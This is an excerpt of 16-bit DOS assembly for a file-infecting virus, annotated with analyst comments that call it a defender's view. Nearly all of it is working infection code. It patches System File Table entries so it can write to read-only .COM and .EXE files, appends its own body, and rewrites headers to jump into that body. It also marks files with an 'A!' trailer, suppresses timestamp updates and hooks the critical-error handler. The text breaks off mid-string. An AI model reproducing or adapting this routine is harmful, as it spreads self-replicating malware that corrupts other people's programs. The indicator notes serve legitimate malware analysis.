;----------------------------------------------------------------------------
; File-infection routine (16-bit DOS, MASM-style syntax).  The routine's
; entry point lies above this excerpt: the lines before `envloop` are
; assumed to leave es:di -> current environment item and bx = handle of the
; file under examination (bx is what INT 2Fh/1220h consumes below) -- confirm
; from the preceding lines.
;
; Analyst notes (defender's view):
;  - Numeric literals are hexadecimal with no suffix (`int 21`, `mov ah,3F`,
;    `mov cx,0200`), which implies a `.radix 16` directive earlier in the
;    file -- TODO confirm.  Only `5A4Dh` (the "MZ" check) carries a suffix.
;  - The routine bypasses documented file calls: it resolves the handle to
;    its System File Table entry via the DOS-internal INT 2Fh functions
;    1220h (get JFT entry) and 1216h (get SFT entry address) and then patches
;    SFT fields in place.  Field offsets used below (+02h open mode, +04h
;    attribute, +05h device-info word, +11h/+13h 32-bit size, +15h/+17h
;    32-bit position, +20h 8-char name, +28h 3-char extension) follow the
;    conventional SFT layout -- verify against DOS documentation.
;  - Observable indicators: a 3-byte trailer "A!"+sign byte at EOF, a
;    suppressed timestamp update on close, INT 24h replaced for the duration
;    of the writes, Ctrl-Break checking turned off, and .COM/.EXE headers
;    rewritten to transfer control to appended code.
;  - Register roles in this excerpt: es:di = SFT entry (after INT 2Fh/1216h),
;    bx = file handle, cs:0100h = I/O buffer (si), dx:ax = 32-bit sizes and
;    positions for the helpers getlen/getoldlen/goto/gotobegin/writeprog.
;----------------------------------------------------------------------------
envloop: mov si,offset envstring-3 ;check the environment
mov cx,ENVLEN                        ; compare ENVLEN bytes of ds:si against the item at es:di
repz cmpsb
jz close ;exit if item found         ; a matching environment entry aborts the whole routine
dec di ;goto next item               ; step back onto the mismatching byte before scanning
xor al,al                            ; look for the NUL that terminates this item
mov ch,0FF                           ; cx becomes a large count (cl is whatever cmpsb left)
repnz scasb
cmp byte ptr es:[di],0 ;finished environment?   ; a second NUL marks the end of the block
jnz envloop
mov ax,3300 ;get ctrl-break flag     ; INT 21h/33h, al=0: current state returned in dl
int 21
push dx                              ; old state; popped into dx for the restore at the end
cwd ;clear the flag                  ; ax is positive, so cwd yields dx=0 (dl=0 = checking off)
inc ax                               ; ax=3301h: set Ctrl-Break state from dl
push ax                              ; 3301h is kept so the epilogue can reissue the call
int 21
mov dx,bx                            ; keep the file handle; INT 21h/35h returns es:bx
mov ax,3524 ;get int24 vector        ; critical-error handler (INT 24h) -> es:bx
int 21
push bx                              ; saved handler offset ...
push es                              ; ... and segment, restored before ret
mov bx,dx                            ; file handle back in bx
push cs
pop ds                               ; ds=cs so ds:dx can address ni24
mov dx,offset ni24 ;set int24 vector ; ni24 is defined outside this excerpt; presumably it
                                     ; swallows critical errors during the writes -- confirm
mov ah,25                            ; al is still 24h -> ax=2524h
push ax                              ; 2524h kept for restoring the original vector later
int 21
mov ax,1220 ;get file-table entry    ; INT 2Fh/1220h (DOS internal): bx=handle -> es:di -> JFT byte
push bx
push ax
int 2F
mov bl,es:[di]                       ; bl = SFT number for this handle
pop ax
sub al,0A                            ; ax=1216h: INT 2Fh get SFT entry address -> es:di
int 2F
pop bx                               ; handle restored
push es
pop ds                               ; ds=es=SFT segment; [di+n] below addresses the SFT entry
push [di+2] ;save attribute & open-mode   ; SFT +02h open mode (word)
push [di+4]                          ; SFT +04h attribute byte plus the byte that follows it
cmp word ptr [di+28],'XE' ;check extension   ; 'XE' is stored little-endian, i.e. "EX" in memory
jne not_exe
cmp byte ptr [di+2A],'E'             ; ... third char 'E' -> extension "EXE"
jmp short check
not_exe: cmp word ptr [di+28],'OC'   ; "CO" in memory ...
jne close1v
cmp byte ptr [di+2A],'M'             ; ... 'M' -> extension "COM"
check: je check_name                 ; only .EXE and .COM files continue
close1v: jmp close1
check_name: cmp byte ptr [di+20],'V' ;name is V*.* ?   ; SFT +20h: base name; V* and F* are skipped
je close1v
cmp byte ptr [di+20],'F' ;name is F*.* ?
je close1v
mov cx,7 ;name is *SC*.* ?           ; seven overlapping word compares cover name[0..7]
mov ax,'CS'                          ; "SC" in memory byte order
push di
add di,21                            ; start one past +20h; the dec below lands on +20h first
SCloop: dec di                       ; scasw advanced di by 2, so the net step is +1 per pass
scasw
loopnz SCloop                        ; exits early when a word matches (ZF=1)
pop di
je close1v                           ; "SC" anywhere in the base name -> skip the file
mov byte ptr [di+2],2 ;open for read/write   ; SFT open mode forced to read/write (ds=es here)
mov byte ptr [di+4],0 ;clear attributes      ; attribute byte zeroed, so read-only no longer blocks writes
call getlen                          ; dx:ax = current file size from the SFT
mov cl,3                             ; cx=3 (ch is 0: cx was <= 7 after the SC loop)
sub ax,cx ;goto signature            ; dx:ax = size-3, where the 3-byte trailer would be
sbb dx,0
call goto                            ; set position; previous position comes back in dx:ax
push ax ;save old offset
push dx
push cs
pop ds                               ; ds=cs: the I/O buffer lives in this segment
mov si,0100 ;read signature          ; cs:0100h is reused as the buffer
mov dx,si
mov ah,3F                            ; INT 21h/3Fh: read cx=3 bytes from handle bx into ds:dx
int 21
cmp word ptr [si],'!A' ;already infected?    ; trailer "A!" (then COMSIGN/EXESIGN) means skip
je close2v
call gotobegin                       ; position 0
mov cl,BUFLEN ;read begin            ; ch still 0 -> cx=BUFLEN
mov dx,si
mov ah,3F
int 21
cmp word ptr [si],5A4Dh ;EXE ?       ; "MZ" (this literal is the only one with an h suffix)
jz do_EXE
cmp word ptr [si],4D5A               ; "ZM", the alternative EXE signature
jz do_EXE
do_COM: mov byte ptr [si+BUFLEN],COMSIGN     ; sign byte placed right after the BUFLEN header copy
cmp byte ptr es:[di+12],0FC ;check length    ; SFT +12h = bits 8..15 of the low size word
jnb close2                           ; size >= FC00h: too large for a .COM target
cmp byte ptr es:[di+12],3
jbe close2                           ; size < 0400h: too small
call writeprog ;write program to end of file ; ZF=1 only if all FILELEN bytes were written
jnz close2
mov byte ptr [si],0E9h ;JMP xxxx'    ; first 3 bytes of the image become a near JMP rel16
call getoldlen                       ; dx:ax = original size (new size - FILELEN)
add ax,(BUFLEN-2)                    ; displacement = original size + BUFLEN - 2, i.e. a jump to
                                     ; offset BUFLEN+1 inside the appended code (matches the EXE IP below)
mov word ptr [si+1],ax
jmp short done
close2v: jmp short close2
do_EXE: mov byte ptr [si+BUFLEN],EXESIGN
call writeprog ;write program to end of file
jnz close2
call getlen ;calculate new length    ; dx:ax = new size
mov cx,0200 ;put new length in header        ; split into 512-byte pages
div cx                               ; dx:ax / 200h -> ax = pages, dx = bytes in the last page
inc ax
mov word ptr [si+4],ax               ; e_cp  (page count)
mov word ptr [si+2],dx               ; e_cblp (bytes in last page)
call getoldlen ;calculate new CS & IP        ; dx:ax = original size
mov cx,0010                          ; convert to paragraphs
div cx
sub ax,word ptr [si+8]               ; minus e_cparhdr (header size) -> load-relative segment
mov word ptr [si+16],ax ;put CS in header    ; e_cs at offset 16h
add dx,BUFLEN+1
mov word ptr [si+14],dx ;put IP in header    ; e_ip at offset 14h
done: call gotobegin                 ; back to offset 0
mov cx,BUFLEN ;write new begin       ; overwrite the original header with the patched copy
mov dx,si
mov ah,40                            ; INT 21h/40h write
int 21
close2: push es
pop ds                               ; ds = SFT segment again
pop dx ;restore old offset in file
pop ax
call goto
or byte ptr [di+6],40 ;no time-change        ; high byte of the SFT device-info word, bit 40h (word bit 14):
                                             ; the "don't update date/time on close" flag -- confirm layout
close1: call close                   ; close is defined outside this excerpt
or byte ptr [di+5],40 ;no EOF on next close  ; low byte of the same word, bit 6; commonly documented as
                                             ; "file has not been written" -- confirm
pop [di+4] ;restore attribute & open-mode
pop [di+2]
pop ax ;restore int24 vector         ; ax=2524h
pop ds                               ; ds:dx = the handler saved at the top
pop dx
int 21
pop ax ;restore ctrl-break flag      ; ax=3301h, dl = state saved at the top
pop dx
int 21
ret
;****************************************************************************
;* Get original length of program
;****************************************************************************
; In:    es:di -> SFT entry (as required by getlen)
; Out:   dx:ax = current file size minus FILELEN, i.e. the size before the
;        appended code (only meaningful after writeprog has run)
; Clobb: ax, dx, flags
getoldlen: call getlen
sub ax,FILELEN                       ; 32-bit subtract: low word ...
sbb dx,0                             ; ... then borrow into the high word
ret
;****************************************************************************
;* Get length of program
;****************************************************************************
; In:    es:di -> SFT entry
; Out:   dx:ax = 32-bit file size read straight from the SFT (+11h low word,
;        +13h high word, assuming the conventional SFT layout -- confirm)
; Clobb: ax, dx
getlen: mov ax,es:[di+11]
mov dx,es:[di+13]
ret
;****************************************************************************
;* Goto new offset DX:AX
;****************************************************************************
; Two entry points:
;   gotobegin - positions the file at offset 0 (falls through into goto)
;   goto      - positions the file at dx:ax
; In:    es:di -> SFT entry; for goto, dx:ax = new 32-bit position
; Out:   dx:ax = the previous position (xchg swaps old and new)
; Clobb: ax, dx only; flags untouched (xor in gotobegin clears CF/OF, sets ZF)
; Note:  the position is written into the SFT (+15h/+17h) directly rather
;        than via INT 21h/42h (lseek).
gotobegin: xor ax,ax
cwd                                  ; ax=0 -> dx=0
goto: xchg ax,es:[di+15]             ; low word of the SFT file position
xchg dx,es:[di+17]                   ; high word
ret
;****************************************************************************
;* Write virus to the file
;****************************************************************************
; Appends FILELEN bytes from ds:si to the end of the open file.
; In:    es:di -> SFT entry; bx = file handle; ds:si -> bytes to write
;        (the caller sets ds=cs, si=0100h)
; Out:   ZF=1 if INT 21h/40h reported all cx bytes written, ZF=0 otherwise
;        (the caller branches on jnz); ax = bytes actually written
; Clobb: ax, cx, dx, flags.  The old position returned by goto in dx:ax is
;        discarded here, so callers wanting it must save it beforehand.
writeprog: call getlen               ; dx:ax = current size
call goto                            ; seek to EOF via the SFT position field
mov cx,FILELEN ;write virus
mov dx,si
mov ah,40                            ; INT 21h/40h: write cx bytes from ds:dx to handle bx
int 21
cmp cx,ax ;are all bytes written?    ; result left in ZF for the caller
ret
;****************************************************************************
;* Text and Signature
;****************************************************************************
envstring db 'E=mc